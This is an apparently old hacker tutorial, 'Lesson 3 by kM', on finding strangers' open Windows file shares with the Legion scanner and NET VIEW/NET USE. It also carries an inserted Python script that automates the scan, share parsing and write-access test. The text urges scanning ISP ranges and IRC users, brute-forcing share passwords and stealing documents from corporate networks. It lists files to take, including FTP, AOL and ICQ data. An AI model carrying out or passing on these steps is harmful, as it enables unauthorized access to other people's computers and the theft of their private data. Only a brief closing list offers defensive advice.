Lesson 3 by kM
kM@hackersclub.com

I'm assuming all of you have downloaded Legion and loaded it. Good. Now it's time to start playing with it.

You need an IP address to start out with. Why not scan your ISP's users? On Win95/98 go to the Start button, choose Run and type winipcfg (NT users: open a command prompt and type IPCONFIG). This will return the IP address your ISP assigned you.

Type that IP address into the SCAN FROM section of Legion. For example, if 206.11.11.13 is my IP address, I put 206.11.11 into Legion. You do not need the last number. Now fill in the TO box at the bottom with 11 (the same third number), so the scan covers 206.11.11.1 through 206.11.11.254. If there are multiple subnets you want to scan, put another number in, but I'd recommend scanning one at a time for now. Now push SCAN.

The left-hand column will display the IP addresses that have NetBIOS support. Once the program has scanned all of .1 - .254, it will then connect to each IP address and run NET VIEW. This will show whether or not that machine has any open shares. If it found one, you should see something like this in the right-hand column:

   Shared resources at \\206.11.11.42

   Sharename   Type   Comment
   -----------------------------------------------------------------
   A           Disk   Floppy
   CDRIVE      Disk   C:\ Drive
   DDRIVE      Disk   D:\ Drive
   CDROM       Disk   CD-Rom Read Only
   The command was completed successfully.

If you don't want Legion eating your resources, you can do the same thing by hand: get a list of IP addresses and, for each one, run

   NET VIEW \\IPADDRESS

This displays the same information as above if the machine has open file shares.

Now that you have found a machine with a file share, how do you connect to it? Simple! Go to DOS and type

   NET USE p: \\IPADDRESS\SHARENAME

For example, to connect to the CDRIVE share in the listing above:

   NET USE p: \\206.11.11.42\CDRIVE

It will normally take some time to connect. Once you are connected, check what type of access you have: make a directory and remove it. If you get "access denied" you have READ access.
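The scan / NET VIEW / NET USE / mkdir-rmdir procedure above, written out as a small Python script. This is an added example, not part of the original lesson and not Legion's code: it builds the same .1 - .254 range Legion sweeps, checks for the NetBIOS session port (139, plus 445 for later Windows hosts), parses the share table NET VIEW prints, and performs the lesson's access test (create a directory, then remove it) on a mounted share. The NET VIEW output and the 206.11.11.x addresses are constructed sample data; enumerate_shares() shells out to the real NET VIEW and so only works on Windows.

```python
"""Added example (not from the original lesson): a hand-rolled Legion.
Sample addresses, share names and NET VIEW output below are constructed."""
import os
import re
import socket
import subprocess
import tempfile
import uuid

# NetBIOS session service (139) and SMB over TCP (445, later Windows hosts).
NETBIOS_PORTS = (139, 445)


def sweep_range(prefix: str, last_from: int = 1, last_to: int = 254):
    """Hosts Legion scans for a 'SCAN FROM 206.11.11' entry: .1 through .254."""
    return [f"{prefix}.{i}" for i in range(last_from, last_to + 1)]


def netbios_open(host: str, timeout: float = 0.5) -> bool:
    """True if the host accepts a TCP connection on 139 or 445 (needs network)."""
    for port in NETBIOS_PORTS:
        try:
            with socket.create_connection((host, port), timeout=timeout):
                return True
        except OSError:
            continue
    return False


# One row of the share table: name, type (Disk/Print/IPC), free-text comment.
SHARE_LINE = re.compile(r"^(\S+)\s+(Disk|Print|IPC)\s*(.*)$")


def parse_net_view(output: str):
    """Parse 'NET VIEW \\\\host' output into (sharename, type, comment) tuples."""
    shares = []
    in_table = False
    for raw in output.splitlines():
        line = raw.strip()
        if line.startswith("---"):          # the dashed rule separates header from rows
            in_table = True
            continue
        if not in_table or not line or line.startswith("The command"):
            continue
        m = SHARE_LINE.match(line)
        if m:
            shares.append((m.group(1), m.group(2), m.group(3).strip()))
    return shares


def enumerate_shares(host: str):
    """Run the real NET VIEW against a host (Windows only) and parse the result."""
    result = subprocess.run(["net", "view", f"\\\\{host}"],
                            capture_output=True, text=True)
    return parse_net_view(result.stdout) if result.returncode == 0 else []


def probe_access(mount_point: str) -> str:
    """The lesson's test: make a directory on the share and remove it again.
    'full' if that works, 'read' if the server refuses, 'unreachable' otherwise."""
    probe = os.path.join(mount_point, f"probe_{uuid.uuid4().hex[:8]}")
    try:
        os.mkdir(probe)
    except PermissionError:
        return "read"
    except OSError:
        return "unreachable"
    os.rmdir(probe)
    return "full"


# Constructed sample: what NET VIEW shows for a box sharing all its drives.
SAMPLE_NET_VIEW = r"""Shared resources at \\206.11.11.42

Sharename   Type   Comment
-----------------------------------------------------------------
A           Disk   Floppy
CDRIVE      Disk   C:\ Drive
DDRIVE      Disk   D:\ Drive
CDROM       Disk   CD-Rom Read Only
The command was completed successfully.
"""

if __name__ == "__main__":
    targets = sweep_range("206.11.11")
    print(f"{len(targets)} hosts to sweep, {targets[0]} .. {targets[-1]}")
    for name, kind, comment in parse_net_view(SAMPLE_NET_VIEW):
        print(f"\\\\206.11.11.42\\{name:8} {kind:5} {comment}")
    # Offline stand-in for a mounted share: a temp directory we can write to.
    with tempfile.TemporaryDirectory() as mounted:
        print("access on a writable directory:", probe_access(mounted))
```

On a real target you would map the share first (NET USE p: \\host\share) and then call probe_access("p:\\"); on a read-only share the mkdir fails with a permission error, which is exactly the "access denied" the lesson describes.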
And if you CAN make and remove that directory, you have FULL access. Sometimes you will even be prompted for a password to the share. You can attempt brute force by guessing a million different passwords.

Now that you know how to scan and link, take it one step further: go to IRC or any place that has a large mass of people, get their IP addresses and do a NET VIEW on each one to see if they are running any shares. Normally, if the user has allowed a FULL access share without a password, I create a text file in C:\WINDOWS\DESKTOP and leave a little message. I will say that in Winhackgold.zip there is a file telling you how to set up a scanner in mIRC for doing the same thing as above.

Now that you have learned about accessing this, it can be handy for other things, like when you get into a corporate network. Any company that is running an NT/95 network, I can guarantee, has open file shares. =] Why not exploit them and take some documents! =]

Things to go after if you get into a computer (remember, since you're probably connecting at 28.8 - 56k, don't go after big files; chances are the user on the other end will disconnect): c:\program files\cuteftp\tree.dat, c:\mirc\downloads, WarFTP stuff, C:\MY DOCUMENTS, C:\WINDOWS\DESKTOP, any text files, AOL data, ICQ data. Most of these are small and you can get them copied quickly.

Also, if you do run file shares, here are a few things you can do to protect yourself:

#1 - Read Only access if you MUST share the entire hard drive (still a bad idea).
#2 - Share out certain folders instead of the entire hard drive. Read Only again.
#3 - DON'T SHARE!
#4 - Load Net Watcher (Control Panel, Add/Remove Software, System Tools, Net Watcher). This requires your Windows 95/98 CD to be loaded. Run it to watch all the connections to your computer; it lets you disconnect people if they start to abuse your computer.

Send all your questions, bitch comments and otherwise praise to me: km@hackersclub.com

kM